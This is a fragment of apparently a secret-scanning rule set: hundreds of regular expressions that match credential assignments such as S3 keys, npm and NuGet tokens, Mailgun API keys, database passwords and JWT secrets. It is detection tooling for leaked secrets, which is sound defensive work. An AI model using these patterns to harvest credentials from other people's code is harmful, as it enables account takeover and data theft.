"(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?repotoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?passwordtravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexuspassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nativeevents[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubeconfig[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + 